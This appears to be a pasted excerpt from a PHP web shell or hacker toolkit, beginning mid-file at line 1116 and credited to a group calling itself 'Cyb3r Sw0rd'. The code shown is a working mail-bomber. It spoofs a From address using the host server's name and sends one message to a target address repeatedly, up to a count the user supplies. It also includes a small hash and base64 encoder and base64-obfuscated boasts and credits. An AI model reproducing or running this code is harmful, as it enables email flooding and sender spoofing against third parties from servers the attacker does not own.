  1116. $sender = $_POST['from'];
  1117. $text = $_POST['message'];
  1118. $subj = $_POST['subject'];
  1119. $camount = $_POST['amount'];
  1120. if ($sender=="")$mailer = "xleetx_snaper";else $mailer = $sender;
  1121. if ($camount<1)$amount = 1;else$amount = $camount;
  1122. $me = $sender;
  1123. $sitename = $_SERVER["HTTP_HOST"];
  1124. $from = strtolower("$me@$sitename");
  1125. $from = $from."<".$from.">";
  1126. $headers = "MIME-Version: 1.0\r\n";
  1127. $headers.="Content-type: text/html; charset=iso-8859-1\r\n";
  1128. $headers.="From: ".$from."\r\n";
  1129. $msg = $text.base64_decode("XG4gXG4gRW5qb3kgQm9tYiEgZG9uJ3QgZm9yZ2V0IHVzIHdlIGFyZSBmcm9tIGN5YjNyIHN3MHJkLiB3ZSBhcmUgQmw0Y0tfQzBkM1IsIHhsZWV0eCBzbmFwZXIsIEhlYXJ0X0JsZWVkLCBUYXNrIEZvcmNlLCBTdG9uZSBIZWFydGVkIEhpeWEsIERyZWFtbGVzcyBTdW5ueSwgU2hvcG5vIE5pbGwsIExlZXQgVG9tb24gXG4gICBSZWdhcmRzLCBuLyB4bGVldHggc25hcGVyIFxuIFByb2dyYW1tZXIgJiBUcmFpbmVyIFxuIEN5YjNyIFN3MHJkIC1XZSBBcmUgVW5iZWF0YWJsZSBuXCB3d3cuZmFjZWJvb2suY29tL3hsZWV0eCBcbiB3d3cuZmFjZWJvb2suY29tL2N5YjNyLnN3b3JkIFxuIA==");
  1130. for ($i=1;$i<$amount;$i++)
  1131. {
  1132. $subject = $subj."_cyb3r_sw0rd_".$i;
  1133. $mailsent = @mail($email, $subject , $msg, $headers);
  1134. }
  1135. echo "<br/>$amount mail bombed Done!<br/>";
  1136. }
  1137. }
  1138. else if (get(action)==hash)
  1139. {
  1140.  
  1141. echo "<font color=\"green\"><b>Hash Encoder</b></font><br/><br/>";
  1142. echo "<form action=\"?action=".get(action)."\" method=\"post\">";
  1143. echo "Value:<br/><textarea name=\"value\"></textarea><br/>";
  1144. echo "<select name=\"method\">";
  1145. echo "<option value=\"md5\">MD5 Hash</option>";
  1146. echo "<option value=\"base64_encode\">Base64 Encode</option>";
  1147. echo "<option value=\"base64_decode\">Base64 Decode</option>";
  1148. echo "</select>";
  1149. echo "<input type=\"hidden\" name=\"hash\" value=\"1\">";
  1150. echo "<br/><input type=\"submit\" value=\"Hash\">";
  1151. echo "</form>";
  1152. if (post(hash)==1)
  1153. {
  1154. $value = post(value);
  1155. $method = post(method);
  1156. if ($method=='md5')
  1157. {
  1158. $result = md5($value);
  1159. }
  1160. else if ($method=="base64_encode")
  1161. {
  1162. $result = base64_encode($value);
  1163. }
  1164. else if ($method=="base64_decode")
  1165. {
  1166. $result = base64_decode($value);
  1167. }
  1168. echo "<br/><br/>Result:<br/><textarea>$result</textarea>";
  1169.  
  1170. }
  1171. }
  1172. echo base64_decode("PGRpdiBjbGFzcz0ndGhhbmtzYm94JyBhbGlnbj0nY2VudGVyJz48c3BhbiBjbGFzcz0ndGhhbmtzX2hlYWQnPkNvZGVkIEJ5PC9zcGFuPiA8YSBocmVmPSdodHRwOi8vZmFjZWJvb2suY29tL3hsZWV0eCc+WGwzM3RYX1NuNHAzUjwvYT4sIDxzcGFuIGNsYXNzPSd0aGFua3NfaGVhZCc+Q28tT3JkaW5hdGlvbjwvc3Bhbj4gPGEgaHJlZj0naHR0cDovL2ZhY2Vib29rLmNvbS9ibGFjay5jb2Qzcic+Qmw0Y0tfQzBkM1I8L2E+PC9kaXY+PGJyLz48YnIvPg==");
  1173. echo base64_decode("PGRpdiBjbGFzcz0nc2xvZ2FuJz48bWFycXVlZT5DeWIzciBTdzByZCAtV2UgQXJlIFVuYmVhdGFibGUhICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyBTZWN1cml0eSBEb2Vzbid0IEV4aXN0cyBpbiBPdXIgRGljdGlvbmFyeSAhISEgV2UgQXJlIEZFQVJMRVNTICEhISBXZSBBcmUgVU5JVEVEICEhISBXZSBBcmUgT05FICEhISBXZSBBcmUgVU5CRUFUQUJMRSAhISEgICA9PSBGZWVsIE91ciBQb3dlciA9PSBGZWVsIFdoYXQgV2UgYXJlID09ICA8L21hcnF1ZWU+PC9kaXY+");
  1174. ?>
  1175. </body>
  1176. </html>
Add Comment
Please, Sign In to add comment